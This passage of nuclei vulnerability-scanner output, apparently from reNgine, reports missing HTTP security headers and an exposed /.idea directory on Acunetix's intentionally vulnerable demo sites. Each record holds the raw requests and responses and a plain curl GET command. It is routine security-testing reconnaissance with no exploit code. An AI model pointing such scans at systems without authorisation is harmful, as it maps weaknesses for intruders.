Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:16.094182437Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea\",\"path\":\"/.idea\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/\",\"request\":\"GET /.idea HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:51 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /.idea/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /.idea/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scopes/\\\"\\u003escopes/\\u003c/a\\u003e 13-Nov-2012 13:29 -\\r\\n\\u003ca href=\\\"acuart.iml\\\"\\u003eacuart.iml\\u003c/a\\u003e 20-Apr-2012 08:22 292\\r\\n\\u003ca href=\\\"encodings.xml\\\"\\u003eencodings.xml\\u003c/a\\u003e 20-Apr-2012 08:22 171\\r\\n\\u003ca href=\\\"misc.xml\\\"\\u003emisc.xml\\u003c/a\\u003e 20-Apr-2012 08:22 266\\r\\n\\u003ca href=\\\"modules.xml\\\"\\u003emodules.xml\\u003c/a\\u003e 20-Apr-2012 08:22 275\\r\\n\\u003ca href=\\\"vcs.xml\\\"\\u003evcs.xml\\u003c/a\\u003e 20-Apr-2012 08:22 173\\r\\n\\u003ca href=\\\"workspace.xml\\\"\\u003eworkspace.xml\\u003c/a\\u003e 20-Apr-2012 08:23 12473\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:16.094213242Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/css\",\"path\":\"/static/css\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/css/\",\"request\":\"GET /static/css HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:16.378345293Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs 